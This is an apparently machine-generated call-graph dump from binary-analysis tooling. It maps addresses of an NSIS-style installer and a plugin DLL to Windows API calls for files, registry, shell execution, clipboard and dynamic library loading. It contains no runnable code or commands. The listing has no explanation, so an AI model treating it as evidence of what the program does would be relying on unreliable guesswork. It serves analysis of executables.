3988->4002 3990->3987 3992->3990 3993->3987 3996->3987 3997->3987 3998->3987 3999->3987 4000->3987 4001 4066e9 SHGetPathFromIDListW CoTaskMemFree 4000->4001 4001->3987 4009 4067d1 4002->4009 4003 406847 4004 40684c CharPrevW 4003->4004 4006 40686d 4003->4006 4004->4003 4005 40683a CharNextW 4005->4003 4005->4009 4006->3943 4008 406826 CharNextW 4008->4009 4009->4003 4009->4005 4009->4008 4010 406835 CharNextW 4009->4010 4023 405e39 4009->4023 4010->4005 4019 4063aa 4011->4019 4014 40646f 4014->3987 4015 40643f RegQueryValueExW RegCloseKey 4015->4014 4016->3987 4017->3987 4018->3988 4020 4063b9 4019->4020 4021 4063c2 RegOpenKeyExW 4020->4021 4022 4063bd 4020->4022 4021->4022 4022->4014 4022->4015 4024 405e3f 4023->4024 4025 405e55 4024->4025 4026 405e46 CharNextW 4024->4026 4025->4009 4026->4024 4076 40653d lstrcpynW 4027->4076 4029 405f25 4077 405eb7 CharNextW CharNextW 4029->4077 4032 405c69 4032->3948 4032->3949 4033 4067c4 5 API calls 4039 405f3b 4033->4039 4034 405f6c lstrlenW 4035 405f77 4034->4035 4034->4039 4037 405e0c 3 API calls 4035->4037 4036 406873 2 API calls 4036->4039 4038 405f7c GetFileAttributesW 4037->4038 4038->4032 4039->4032 4039->4034 4039->4036 4040 405e58 2 API calls 4039->4040 4040->4034 4041->3953 4043 405e66 4042->4043 4044 405e78 4043->4044 4045 405e6c CharPrevW 4043->4045 4044->3957 4045->4043 4045->4044 4046->3983 4083 406008 GetFileAttributesW 4047->4083 4050 405c2e 4050->3983 4051 405c24 DeleteFileW 4053 405c2a 4051->4053 4052 405c1c RemoveDirectoryW 4052->4053 4053->4050 4054 405c3a SetFileAttributesW 4053->4054 4054->4050 4056 4055ba 4055->4056 4065 40565c 4055->4065 4057 4055d6 lstrlenW 4056->4057 4058 40657a 17 API calls 4056->4058 4059 4055e4 lstrlenW 4057->4059 4060 4055ff 4057->4060 4058->4057 4061 4055f6 lstrcatW 4059->4061 4059->4065 4062 405612 4060->4062 4063 405605 SetWindowTextW 4060->4063 4061->4060 4064 405618 SendMessageW SendMessageW SendMessageW 4062->4064 4062->4065 4063->4062 4064->4065 4065->3983 4067 40631e 4066->4067 4068 406311 4066->4068 4067->3983 4086 406183 4068->4086 4071 405dcd 4070->4071 4072 406889 FindClose 4070->4072 4071->3950 4071->3963 4072->4071 4074 405dd7 4073->4074 4075 405e28 lstrcatW 4073->4075 4074->3968 4075->4074 4076->4029 4078 405ed4 4077->4078 4080 405ee6 4077->4080 4079 405ee1 CharNextW 4078->4079 4078->4080 4082 405f0a 4079->4082 4081 405e39 CharNextW 4080->4081 4080->4082 4081->4080 4082->4032 4082->4033 4084 405c0d 4083->4084 4085 40601a SetFileAttributesW 4083->4085 4084->4050 4084->4051 4084->4052 4085->4084 4087 4061b3 4086->4087 4088 4061d9 GetShortPathNameW 4086->4088 4113 40602d GetFileAttributesW CreateFileW 4087->4113 4089 4062f8 4088->4089 4090 4061ee 4088->4090 4089->4067 4090->4089 4093 4061f6 wsprintfA 4090->4093 4092 4061bd CloseHandle GetShortPathNameW 4092->4089 4094 4061d1 4092->4094 4095 40657a 17 API calls 4093->4095 4094->4088 4094->4089 4096 40621e 4095->4096 4114 40602d GetFileAttributesW CreateFileW 4096->4114 4098 40622b 4098->4089 4099 40623a GetFileSize GlobalAlloc 4098->4099 4100 4062f1 CloseHandle 4099->4100 4101 40625c 4099->4101 4100->4089 4115 4060b0 ReadFile 4101->4115 4106 40627b lstrcpyA 4110 40629d 4106->4110 4107 40628f 4108 405f92 4 API calls 4107->4108 4108->4110 4109 4062d4 SetFilePointer 4122 4060df WriteFile 4109->4122 4110->4109 4113->4092 4114->4098 4116 4060ce 4115->4116 4116->4100 4117 405f92 lstrlenA 4116->4117 4118 405fd3 lstrlenA 4117->4118 4119 405fdb 4118->4119 4120 405fac lstrcmpiA 4118->4120 4119->4106 4119->4107 4120->4119 4121 405fca CharNextA 4120->4121 4121->4118 4123 4060fd GlobalFree 4122->4123 4123->4100 4124 4015c1 4125 402da6 17 API calls 4124->4125 4126 4015c8 4125->4126 4127 405eb7 4 API calls 4126->4127 4139 4015d1 4127->4139 4128 401631 4130 401663 4128->4130 4131 401636 4128->4131 4129 405e39 CharNextW 4129->4139 4133 401423 24 API calls 4130->4133 4151 401423 4131->4151 4141 40165b 4133->4141 4138 40164a SetCurrentDirectoryW 4138->4141 4139->4128 4139->4129 4140 401617 GetFileAttributesW 4139->4140 4143 405b08 4139->4143 4146 405a6e CreateDirectoryW 4139->4146 4155 405aeb CreateDirectoryW 4139->4155 4140->4139 4158 40690a GetModuleHandleA 4143->4158 4147 405abf GetLastError 4146->4147 4148 405abb 4146->4148 4147->4148 4149 405ace SetFileSecurityW 4147->4149 4148->4139 4149->4148 4150 405ae4 GetLastError 4149->4150 4150->4148 4152 40559f 24 API calls 4151->4152 4153 401431 4152->4153 4154 40653d lstrcpynW 4153->4154 4154->4138 4156 405aff GetLastError 4155->4156 4157 405afb 4155->4157 4156->4157 4157->4139 4159 406930 GetProcAddress 4158->4159 4160 406926 4158->4160 4162 405b0f 4159->4162 4164 40689a GetSystemDirectoryW 4160->4164 4162->4139 4163 40692c 4163->4159 4163->4162 4165 4068bc wsprintfW LoadLibraryExW 4164->4165 4165->4163 4857 401c43 4858 402d84 17 API calls 4857->4858 4859 401c4a 4858->4859 4860 402d84 17 API calls 4859->4860 4861 401c57 4860->4861 4862 401c6c 4861->4862 4863 402da6 17 API calls 4861->4863 4864 401c7c 4862->4864 4865 402da6 17 API calls 4862->4865 4863->4862 4866 401cd3 4864->4866 4867 401c87 4864->4867 4865->4864 4868 402da6 17 API calls 4866->4868 4869 402d84 17 API calls 4867->4869 4870 401cd8 4868->4870 4871 401c8c 4869->4871 4872 402da6 17 API calls 4870->4872 4873 402d84 17 API calls 4871->4873 4875 401ce1 FindWindowExW 4872->4875 4874 401c98 4873->4874 4876 401cc3 SendMessageW 4874->4876 4877 401ca5 SendMessageTimeoutW 4874->4877 4878 401d03 4875->4878 4876->4878 4877->4878 4879 404943 4880 404953 4879->4880 4881 404979 4879->4881 4882 404499 18 API calls 4880->4882 4883 404500 8 API calls 4881->4883 4884 404960 SetDlgItemTextW 4882->4884 4885 404985 4883->4885 4884->4881 4886 4028c4 4887 4028ca 4886->4887 4888 4028d2 FindClose 4887->4888 4889 402c2a 4887->4889 4888->4889 4893 4016cc 4894 402da6 17 API calls 4893->4894 4895 4016d2 GetFullPathNameW 4894->4895 4897 4016ec 4895->4897 4902 40170e 4895->4902 4896 401723 GetShortPathNameW 4899 402c2a 4896->4899 4898 406873 2 API calls 4897->4898 4897->4902 4900 4016fe 4898->4900 4900->4902 4903 40653d lstrcpynW 4900->4903 4902->4896 4902->4899 4903->4902 4904 401e4e GetDC 4905 402d84 17 API calls 4904->4905 4906 401e60 GetDeviceCaps MulDiv ReleaseDC 4905->4906 4907 402d84 17 API calls 4906->4907 4908 401e91 4907->4908 4909 40657a 17 API calls 4908->4909 4910 401ece CreateFontIndirectW 4909->4910 4911 402638 4910->4911 4912 4045cf lstrcpynW lstrlenW 4913 402950 4914 402da6 17 API calls 4913->4914 4916 40295c 4914->4916 4915 402972 4918 406008 2 API calls 4915->4918 4916->4915 4917 402da6 17 API calls 4916->4917 4917->4915 4919 402978 4918->4919 4941 40602d GetFileAttributesW CreateFileW 4919->4941 4921 402985 4922 402a3b 4921->4922 4923 4029a0 GlobalAlloc 4921->4923 4924 402a23 4921->4924 4925 402a42 DeleteFileW 4922->4925 4926 402a55 4922->4926 4923->4924 4927 4029b9 4923->4927 4928 4032b4 31 API calls 4924->4928 4925->4926 4942 4034e5 SetFilePointer 4927->4942 4930 402a30 CloseHandle 4928->4930 4930->4922 4931 4029bf 4932 4034cf ReadFile 4931->4932 4933 4029c8 GlobalAlloc 4932->4933 4934 4029d8 4933->4934 4935 402a0c 4933->4935 4937 4032b4 31 API calls 4934->4937 4936 4060df WriteFile 4935->4936 4938 402a18 GlobalFree 4936->4938 4940 4029e5 4937->4940 4938->4924 4939 402a03 GlobalFree 4939->4935 4940->4939 4941->4921 4942->4931 4943 7319170d 4949 731915b6 4943->4949 4945 7319176b GlobalFree 4946 73191725 4946->4945 4947 73191740 4946->4947 4948 73191757 VirtualFree 4946->4948 4947->4945 4948->4945 4951 731915bc 4949->4951 4950 731915c2 4950->4946 4951->4950 4952 731915ce GlobalFree 4951->4952 4952->4946 4953 401956 4954 402da6 17 API calls 4953->4954 4955 40195d lstrlenW 4954->4955 4956 402638 4955->4956 4957 4014d7 4958 402d84 17 API calls 4957->4958 4959 4014dd Sleep 4958->4959 4961 402c2a 4959->4961 4170 4020d8 4171 4020ea 4170->4171 4172 40219c 4170->4172 4173 402da6 17 API calls 4171->4173 4174 401423 24 API calls 4172->4174 4175 4020f1 4173->4175 4180 4022f6 4174->4180 4176 402da6 17 API calls 4175->4176 4177 4020fa 4176->4177 4178 402110 LoadLibraryExW 4177->4178 4179 402102 GetModuleHandleW 4177->4179 4178->4172 4181 402121 4178->4181 4179->4178 4179->4181 4193 406979 4181->4193 4184 402132 4186 402151 4184->4186 4187 40213a 4184->4187 4185 40216b 4188 40559f 24 API calls 4185->4188 4198 73191817 4186->4198 4189 401423 24 API calls 4187->4189 4190 402142 4188->4190 4189->4190 4190->4180 4191 40218e FreeLibrary 4190->4191 4191->4180 4240 40655f WideCharToMultiByte 4193->4240 4195 406996 4196 40699d GetProcAddress 4195->4196 4197 40212c 4195->4197 4196->4197 4197->4184 4197->4185 4199 7319184a 4198->4199 4241 73191bff 4199->4241 4201 73191851 4202 73191976 4201->4202 4203 73191869 4201->4203 4204 73191862 4201->4204 4202->4190 4275 73192480 4203->4275 4291 7319243e 4204->4291 4209 731918cd 4213 7319191e 4209->4213 4214 731918d3 4209->4214 4210 731918af 4304 73192655 4210->4304 4211 73191898 4227 7319188e 4211->4227 4301 73192e23 4211->4301 4212 7319187f 4216 73191885 4212->4216 4221 73191890 4212->4221 4219 73192655 10 API calls 4213->4219 4323 73191666 4214->4323 4216->4227 4285 73192b98 4216->4285 4225 7319190f 4219->4225 4220 731918b5 4315 73191654 4220->4315 4295 73192810 4221->4295 4231 73191965 4225->4231 4329 73192618 4225->4329 4227->4209 4227->4210 4228 73191896 4228->4227 4229 73192655 10 API calls 4229->4225 4231->4202 4233 7319196f GlobalFree 4231->4233 4233->4202 4237 73191951 4237->4231 4333 731915dd wsprintfW 4237->4333 4239 7319194a FreeLibrary 4239->4237 4240->4195 4336 731912bb GlobalAlloc 4241->4336 4243 73191c26 4337 731912bb GlobalAlloc 4243->4337 4245 73191e6b GlobalFree GlobalFree GlobalFree 4246 73191e88 4245->4246 4260 73191ed2 4245->4260 4248 73191e9d 4246->4248 4249 7319227e 4246->4249 4246->4260 4247 73191c31 4247->4245 4250 73191d26 GlobalAlloc 4247->4250 4251 731921ae 4247->4251 4253 73191d71 lstrcpyW 4247->4253 4254 73191d8f GlobalFree 4247->4254 4257 73191d7b lstrcpyW 4247->4257 4259 73192126 4247->4259 4247->4260 4266 73192067 GlobalFree 4247->4266 4268 731912cc 2 API calls 4247->4268 4269 73191dcd 4247->4269 4248->4260 4340 731912cc 4248->4340 4252 731922a0 GetModuleHandleW 4249->4252 4249->4260 4250->4247 4251->4260 4272 73192216 lstrcpyW 4251->4272 4255 731922b1 LoadLibraryW 4252->4255 4256 731922c6 4252->4256 4253->4257 4254->4247 4255->4256 4255->4260 4344 731916bd WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4256->4344 4257->4247 4343 731912bb GlobalAlloc 4259->4343 4260->4201 4262 73192318 4262->4260 4263 73192325 lstrlenW 4262->4263 4345 731916bd WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4263->4345 4266->4247 4267 7319233f 4267->4260 4268->4247 4269->4247 4338 7319162f GlobalSize GlobalAlloc 4269->4338 4270 731922d8 4270->4262 4273 73192302 GetProcAddress 4270->4273 4272->4260 4273->4262 4274 7319212f 4274->4201 4282 73192498 4275->4282 4277 731925c1 GlobalFree 4280 7319186f 4277->4280 4277->4282 4278 7319256b GlobalAlloc CLSIDFromString 4278->4277 4279 73192540 GlobalAlloc WideCharToMultiByte 4279->4277 4280->4211 4280->4212 4280->4227 4281 731912cc GlobalAlloc lstrcpynW 4281->4282 4282->4277 4282->4278 4282->4279 4282->4281 4284 7319258a 4282->4284 4347 7319135a 4282->4347 4284->4277 4351 731927a4 4284->4351 4287 73192baa 4285->4287 4286 73192c4f CloseHandle 4290 73192c6d 4286->4290 4287->4286 4289 73192d39 4289->4227 4354 73192b42 4290->4354 4292 73192453 4291->4292 4293 7319245e GlobalAlloc 4292->4293 4294 73191868 4292->4294 4293->4292 4294->4203 4299 73192840 4295->4299 4296 731928db GlobalAlloc 4300 731928fe 4296->4300 4297 731928ee 4298 731928f4 GlobalSize 4297->4298 4297->4300 4298->4300 4299->4296 4299->4297 4300->4228 4302 73192e2e 4301->4302 4303 73192e6e GlobalFree 4302->4303 4358 731912bb GlobalAlloc 4304->4358 4306 731926d8 MultiByteToWideChar 4311 7319265f 4306->4311 4307 7319270b lstrcpynW 4307->4311 4308 731926fa StringFromGUID2 4308->4311 4309 73192742 GlobalFree 4309->4311 4310 7319271e wsprintfW 4310->4311 4311->4306 4311->4307 4311->4308 4311->4309 4311->4310 4312 73192777 GlobalFree 4311->4312 4313 73191312 2 API calls 4311->4313 4359 73191381 4311->4359 4312->4220 4313->4311 4363 731912bb GlobalAlloc 4315->4363 4317 73191659 4318 73191666 2 API calls 4317->4318 4319 73191663 4318->4319 4320 73191312 4319->4320 4321 7319131b GlobalAlloc lstrcpynW 4320->4321 4322 73191355 GlobalFree 4320->4322 4321->4322 4322->4225 4324 7319169f lstrcpyW 4323->4324 4325 73191672 wsprintfW 4323->4325 4328 731916b8 4324->4328 4325->4328 4328->4229 4330 73191931 4329->4330 4331 73192626 4329->4331 4330->4237 4330->4239 4331->4330 4332 73192642 GlobalFree 4331->4332 4332->4331 4334 73191312 2 API calls 4333->4334 4335 731915fe 4334->4335 4335->4231 4336->4243 4337->4247 4339 7319164d 4338->4339 4339->4269 4346 731912bb GlobalAlloc 4340->4346 4342 731912db lstrcpynW 4342->4260 4343->4274 4344->4270 4345->4267 4346->4342 4348 73191361 4347->4348 4349 731912cc 2 API calls 4348->4349 4350 7319137f 4349->4350 4350->4282 4352 73192808 4351->4352 4353 731927b2 VirtualAlloc 4351->4353 4352->4284 4353->4352 4355 73192b4d 4354->4355 4356 73192b5d 4355->4356 4357 73192b52 GetLastError 4355->4357 4356->4289 4357->4356 4358->4311 4360 7319138a 4359->4360 4361 731913ac 4359->4361 4360->4361 4362 73191390 lstrcpyW 4360->4362 4361->4311 4362->4361 4363->4317 4962 404658 4964 404670 4962->4964 4969 40478a 4962->4969 4963 4047f4 4965 4048be 4963->4965 4966 4047fe GetDlgItem 4963->4966 4970 404499 18 API calls 4964->4970 4972 404500 8 API calls 4965->4972 4967 404818 4966->4967 4968 40487f 4966->4968 4967->4968 4975 40483e SendMessageW LoadCursorW SetCursor 4967->4975 4968->4965 4976 404891 4968->4976 4969->4963 4969->4965 4973 4047c5 GetDlgItem SendMessageW 4969->4973 4971 4046d7 4970->4971 4974 404499 18 API calls 4971->4974 4986 4048b9 4972->4986 4995 4044bb KiUserCallbackDispatcher 4973->4995 4978 4046e4 CheckDlgButton 4974->4978 4999 404907 4975->4999 4980 4048a7 4976->4980 4981 404897 SendMessageW 4976->4981 4993 4044bb KiUserCallbackDispatcher 4978->4993 4980->4986 4987 4048ad SendMessageW 4980->4987 4981->4980 4982 4047ef 4996 4048e3 4982->4996 4987->4986 4988 404702 GetDlgItem 4994 4044ce SendMessageW 4988->4994 4990 404718 SendMessageW 4991 404735 GetSysColor 4990->4991 4992 40473e SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4990->4992 4991->4992 4992->4986 4993->4988 4994->4990 4995->4982 4997 4048f1 4996->4997 4998 4048f6 SendMessageW 4996->4998 4997->4998 4998->4963 5002 405b63 ShellExecuteExW 4999->5002 5001 40486d LoadCursorW SetCursor 5001->4968 5002->5001 5003 402b59 5004 402b60 5003->5004 5005 402bab 5003->5005 5008 402d84 17 API calls 5004->5008 5011 402ba9 5004->5011 5006 40690a 5 API calls 5005->5006 5007 402bb2 5006->5007 5009 402da6 17 API calls 5007->5009 5010 402b6e 5008->5010 5012 402bbb 5009->5012 5013 402d84 17 API calls 5010->5013 5012->5011 5014 402bbf IIDFromString 5012->5014 5016 402b7a 5013->5016 5014->5011 5015 402bce 5014->5015 5015->5011 5021 40653d lstrcpynW 5015->5021 5020 406484 wsprintfW 5016->5020 5019 402beb CoTaskMemFree 5019->5011 5020->5011 5021->5019 5022 73191000 5025 7319101b 5022->5025 5026 731915b6 GlobalFree 5025->5026 5027 73191020 5026->5027 5028 73191024 5027->5028 5029 73191027 GlobalAlloc 5027->5029 5030 731915dd 3 API calls 5028->5030 5029->5028 5031 73191019 5030->5031 4473 40175c 4474 402da6 17 API calls 4473->4474 4475 401763 4474->4475 4479 40605c 4475->4479 4477 40176a 4478 40605c 2 API calls 4477->4478 4478->4477 4480 406069 GetTickCount GetTempFileNameW 4479->4480 4481 40609f 4480->4481 4482 4060a3 4480->4482 4481->4480 4481->4482 4482->4477 5032 401d5d 5033 402d84 17 API calls 5032->5033 5034 401d6e SetWindowLongW 5033->5034 5035 402c2a 5034->5035 4755 401ede 4763 402d84 4755->4763 4757 401ee4 4758 402d84 17 API calls 4757->4758 4759 401ef0 4758->4759 4760 401f07 EnableWindow 4759->4760 4761 401efc ShowWindow 4759->4761 4762 402c2a 4760->4762 4761->4762 4764 40657a 17 API calls 4763->4764 4765 402d99 4764->4765 4765->4757 4766 4056de 4767 405888 4766->4767 4768 4056ff GetDlgItem GetDlgItem GetDlgItem 4766->4768 4770 405891 GetDlgItem CreateThread CloseHandle 4767->4770 4771 4058b9 4767->4771 4812 4044ce SendMessageW 4768->4812 4770->4771 4815 405672 5 API calls 4770->4815 4773 4058e4 4771->4773 4774 4058d0 ShowWindow ShowWindow 4771->4774 4775 405909 4771->4775 4772 40576f 4782 405776 GetClientRect GetSystemMetrics SendMessageW SendMessageW 4772->4782 4776 4058f0 4773->4776 4777 405944 4773->4777 4814 4044ce SendMessageW 4774->4814 4781 404500 8 API calls 4775->4781 4779 4058f8 4776->4779 4780 40591e ShowWindow 4776->4780 4777->4775 4783 405952 SendMessageW 4777->4783 4784 404472 SendMessageW 4779->4784 4785 405930 4780->4785 4786 40593e 4780->4786 4789 405917 4781->4789 4787 4057e4 4782->4787 4788 4057c8 SendMessageW SendMessageW 4782->4788 4783->4789 4790 40596b CreatePopupMenu 4783->4790 4784->4775 4793 40559f 24 API calls 4785->4793 4794 404472 SendMessageW 4786->4794 4791 4057f7 4787->4791 4792 4057e9 SendMessageW 4787->4792 4788->4787 4795 40657a 17 API calls 4790->4795 4796 404499 18 API calls 4791->4796 4792->4791 4793->4786 4794->4777 4797 40597b AppendMenuW 4795->4797 4798 405807 4796->4798 4799 405998 GetWindowRect 4797->4799 4800 4059ab TrackPopupMenu 4797->4800 4801 405810 ShowWindow 4798->4801 4802 405844 GetDlgItem SendMessageW 4798->4802 4799->4800 4800->4789 4803 4059c6 4800->4803 4804 405833 4801->4804 4805 405826 ShowWindow 4801->4805 4802->4789 4806 40586b SendMessageW SendMessageW 4802->4806 4807 4059e2 SendMessageW 4803->4807 4813 4044ce SendMessageW 4804->4813 4805->4804 4806->4789 4807->4807 4808 4059ff OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4807->4808 4810 405a24 SendMessageW 4808->4810 4810->4810 4811 405a4d GlobalUnlock SetClipboardData CloseClipboard 4810->4811 4811->4789 4812->4772 4813->4802 4814->4773 5036 4028de 5037 4028e6 5036->5037 5038 4028ea FindNextFileW 5037->5038 5041 4028fc 5037->5041 5039 402943 5038->5039 5038->5041 5042 40653d lstrcpynW 5039->5042 5042->5041 5043 404ce0 5044 404cf0 5043->5044 5045 404d0c 5043->5045 5054 405b81 GetDlgItemTextW 5044->5054 5047 404d12 SHGetPathFromIDListW 5045->5047 5048 404d3f 5045->5048 5050 404d29 SendMessageW 5047->5050 5051 404d22 5047->5051 5049 404cfd SendMessageW 5049->5045 5050->5048 5052 40140b 2 API calls 5051->5052 5052->5050 5054->5049 5055 401563 5056 402ba4 5055->5056 5059 406484 wsprintfW 5056->5059 5058 402ba9 5059->5058 5060 7319103d 5061 7319101b 5 API calls 5060->5061 5062 73191056 5061->5062 5063 401968 5064 402d84 17 API calls 5063->5064 5065 40196f 5064->5065 5066 402d84 17 API calls 5065->5066 5067 40197c 5066->5067 5068 402da6 17 API calls 5067->5068 5069 401993 lstrlenW 5068->5069 5071 4019a4 5069->5071 5070 4019e5 5071->5070 5075 40653d lstrcpynW 5071->5075 5073 4019d5 5073->5070 5074 4019da lstrlenW 5073->5074 5074->5070 5075->5073 5076 40166a 5077 402da6 17 API calls 5076->5077 5078 401670 5077->5078 5079 406873 2 API calls 5078->5079 5080 401676 5079->5080 5081 402aeb 5082 402d84 17 API calls 5081->5082 5083 402af1 5082->5083 5084 40657a 17 API calls 5083->5084 5085 40292e 5083->5085 5084->5085 5086 4026ec 5087 402d84 17 API calls 5086->5087 5094 4026fb 5087->5094 5088 402838 5089 402745 ReadFile 5089->5088 5089->5094 5090 4060b0 ReadFile 5090->5094 5091 402785 MultiByteToWideChar 5091->5094 5092 40283a 5108 406484 wsprintfW 5092->5108 5094->5088 5094->5089 5094->5090 5094->5091 5094->5092 5096 4027ab SetFilePointer MultiByteToWideChar 5094->5096 5097 40284b 5094->5097 5099 40610e SetFilePointer 5094->5099 5096->5094 5097->5088 5098 40286c SetFilePointer 5097->5098 5098->5088 5100 40612a 5099->5100 5103 406142 5099->5103 5101 4060b0 ReadFile 5100->5101 5102 406136 5101->5102 5102->5103 5104 406173 SetFilePointer 5102->5104 5105 40614b SetFilePointer 5102->5105 5103->5094 5104->5103 5105->5104 5106 406156 5105->5106 5107 4060df WriteFile 5106->5107 5107->5103 5108->5088 4816 40176f 4817 402da6 17 API calls 4816->4817 4818 401776 4817->4818 4819 401796 4818->4819 4820 40179e 4818->4820 4855 40653d lstrcpynW 4819->4855 4856 40653d lstrcpynW 4820->4856 4823 40179c 4827 4067c4 5 API calls 4823->4827 4824 4017a9 4825 405e0c 3 API calls 4824->4825 4826 4017af lstrcatW 4825->4826 4826->4823 4829 4017bb 4827->4829 4828 406873 2 API calls 4828->4829 4829->4828 4830 406008 2 API calls 4829->4830 4832 4017cd CompareFileTime 4829->4832 4833 40188d 4829->4833 4834 401864 4829->4834 4836 40653d lstrcpynW 4829->4836 4842 40657a 17 API calls 4829->4842 4850 405b9d MessageBoxIndirectW 4829->4850 4854 40602d GetFileAttributesW CreateFileW 4829->4854 4830->4829 4832->4829 4835 40559f 24 API calls 4833->4835 4838 40559f 24 API calls 4834->4838 4852 401879 4834->4852 4837 401897 4835->4837 4836->4829 4839 4032b4 31 API calls 4837->4839 4838->4852 4840 4018aa 4839->4840 4841 4018be SetFileTime 4840->4841 4843 4018d0 CloseHandle 4840->4843 4841->4843 4842->4829 4844 4018e1 4843->4844 4843->4852 4845 4018e6 4844->4845 4846 4018f9 4844->4846 4848 40657a 17 API calls 4845->4848 4847 40657a 17 API calls 4846->4847 4849 401901 4847->4849 4851 4018ee lstrcatW 4848->4851 4849->4852 4853 405b9d MessageBoxIndirectW 4849->4853 4850->4829 4851->4849 4853->4852 4854->4829 4855->4823 4856->4824 5109 401a72 5110 402d84 17 API calls 5109->5110 5111 401a7b 5110->5111 5112 402d84 17 API calls 5111->5112 5113 401a20 5112->5113 5114 401573 5115 401583 ShowWindow 5114->5115 5116 40158c 5114->5116 5115->5116 5117 402c2a 5116->5117 5118 40159a ShowWindow 5116->5118 5118->5117 5119 4023f4 5120 402da6 17 API calls 5119->5120 5121 402403 5120->5121 5122 402da6 17 API calls 5121->5122 5123 40240c 5122->5123 5124 402da6 17 API calls 5123->5124 5125 402416 GetPrivateProfileStringW 5124->5125 5126 4014f5 SetForegroundWindow 5127 402c2a 5126->5127 5128 401ff6 5129 402da6 17 API calls 5128->5129 5130 401ffd 5129->5130 5131 406873 2 API calls 5130->5131 5132 402003 5131->5132 5134 402014 5132->5134 5135 406484 wsprintfW 5132->5135 5135->5134 5136 401b77 5137 402da6 17 API calls 5136->5137 5138 401b7e 5137->5138 5139 402d84 17 API calls 5138->5139 5140 401b87 wsprintfW 5139->5140 5141 402c2a 5140->5141 5142 40167b 5143 402da6 17 API calls 5142->5143 5144 401682 5143->5144 5145 402da6 17 API calls 5144->5145 5146 40168b 5145->5146 5147 402da6 17 API calls 5146->5147 5148 401694 MoveFileW 5147->5148 5149 4016a7 5148->5149 5150 4016a0 5148->5150 5152 406873 2 API calls 5149->5152 5154 4022f6 5149->5154 5151 401423 24 API calls 5150->5151 5151->5154 5153 4016b6 5152->5153 5153->5154 5155 4062fd 36 API calls 5153->5155 5155->5150 5156 4022ff 5157 402da6 17 API calls 5156->5157 5158 402305 5157->5158 5159 402da6 17 API calls 5158->5159 5160 40230e 5159->5160 5161 402da6 17 API calls 5160->5161 5162 402317 5161->5162 5163 406873 2 API calls 5162->5163 5164 402320 5163->5164 5165 402331 lstrlenW lstrlenW 5164->5165 5169 402324 5164->5169 5167 40559f 24 API calls 5165->5167 5166 40559f 24 API calls 5170 40232c 5166->5170 5168 40236f SHFileOperationW 5167->5168 5168->5169 5168->5170 5169->5166 5169->5170 5171 4019ff 5172 402da6 17 API calls 5171->5172 5173 401a06 5172->5173 5174 402da6 17 API calls 5173->5174 5175 401a0f 5174->5175 5176 401a16 lstrcmpiW 5175->5176 5177 401a28 lstrcmpW 5175->5177 5178 401a1c 5176->5178 5177->5178 5179 401000 5180 401037 BeginPaint GetClientRect 5179->5180 5181 40100c DefWindowProcW 5179->5181 5182 4010f3 5180->5182 5184 401179 5181->5184 5185 401073 CreateBrushIndirect FillRect DeleteObject 5182->5185 5186 4010fc 5182->5186 5185->5182 5187 401102 CreateFontIndirectW 5186->5187 5188 401167 EndPaint 5186->5188 5187->5188 5189 401112 6 API calls 5187->5189 5188->5184 5189->5188 5190 73191058 5192 73191074 5190->5192 5191 731910dd 5192->5191 5193 731915b6 GlobalFree 5192->5193 5194 73191092 5192->5194 5193->5194 5195 731915b6 GlobalFree 5194->5195 5196 731910a2 5195->5196 5197 731910a9 GlobalSize 5196->5197 5198 731910b2 5196->5198 5197->5198 5199 731910c7 5198->5199 5200 731910b6 GlobalAlloc 5198->5200 5202 731910d2 GlobalFree 5199->5202 5201 731915dd 3 API calls 5200->5201 5201->5199 5202->5191 5203 401d81 5204 401d94 GetDlgItem 5203->5204 5205 401d87 5203->5205 5206 401d8e 5204->5206 5207 402d84 17 API calls 5205->5207 5208 401dd5 GetClientRect LoadImageW SendMessageW 5206->5208 5209 402da6 17 API calls 5206->5209 5207->5206 5211 401e33 5208->5211 5213 401e3f 5208->5213 5209->5208 5212 401e38 DeleteObject 5211->5212 5211->5213 5212->5213 5214 401503 5215 40150b 5214->5215 5217 40151e 5214->5217 5216 402d84 17 API calls 5215->5216 5216->5217 5218 402383 5219 40239d 5218->5219 5220 40238a 5218->5220 5221 40657a 17 API calls 5220->5221 5222 402397 5221->5222 5222->5219 5223 405b9d MessageBoxIndirectW 5222->5223 5223->5219 5224 402c05 SendMessageW 5225 402c2a 5224->5225 5226 402c1f InvalidateRect 5224->5226 5226->5225 5227 404f06 GetDlgItem GetDlgItem 5228 404f58 7 API calls 5227->5228 5234 40517d 5227->5234 5229 404ff2 SendMessageW 5228->5229 5230 404fff DeleteObject 5228->5230 5229->5230 5231 405008 5230->5231 5233 40503f 5231->5233 5235 40657a 17 API calls 5231->5235 5232 40525f 5237 40530b 5232->5237 5246 4052b8 SendMessageW 5232->5246 5269 405170 5232->5269 5236 404499 18 API calls 5233->5236 5234->5232 5270 4051ec 5234->5270 5281 404e54 SendMessageW 5234->5281 5240 405021 SendMessageW SendMessageW 5235->5240 5241 405053 5236->5241 5238 405315 SendMessageW 5237->5238 5239 40531d 5237->5239 5238->5239 5248 405336 5239->5248 5249 40532f ImageList_Destroy 5239->5249 5257 405346 5239->5257 5240->5231 5245 404499 18 API calls 5241->5245 5242 405251 SendMessageW 5242->5232 5243 404500 8 API calls 5247 40550c 5243->5247 5260 405064 5245->5260 5251 4052cd SendMessageW 5246->5251 5246->5269 5252 40533f GlobalFree 5248->5252 5248->5257 5249->5248 5250 4054c0 5255 4054d2 ShowWindow GetDlgItem ShowWindow 5250->5255 5250->5269 5254 4052e0 5251->5254 5252->5257 5253 40513f GetWindowLongW SetWindowLongW 5256 405158 5253->5256 5262 4052f1 SendMessageW 5254->5262 5255->5269 5258 405175 5256->5258 5259 40515d ShowWindow 5256->5259 5257->5250 5272 405381 5257->5272 5286 404ed4 5257->5286 5280 4044ce SendMessageW 5258->5280 5279 4044ce SendMessageW 5259->5279 5260->5253 5261 4050b7 SendMessageW 5260->5261 5263 40513a 5260->5263 5266 4050f5 SendMessageW 5260->5266 5267 405109 SendMessageW 5260->5267 5261->5260 5262->5237 5263->5253 5263->5256 5266->5260 5267->5260 5269->5243 5270->5232 5270->5242 5271 40548b 5273 405496 InvalidateRect 5271->5273 5275 4054a2 5271->5275 5274 4053af SendMessageW 5272->5274 5276 4053c5 5272->5276 5273->5275 5274->5276 5275->5250 5295 404e0f 5275->5295 5276->5271 5278 405439 SendMessageW SendMessageW 5276->5278 5278->5276 5279->5269 5280->5234 5282 404eb3 SendMessageW 5281->5282 5283 404e77 GetMessagePos ScreenToClient 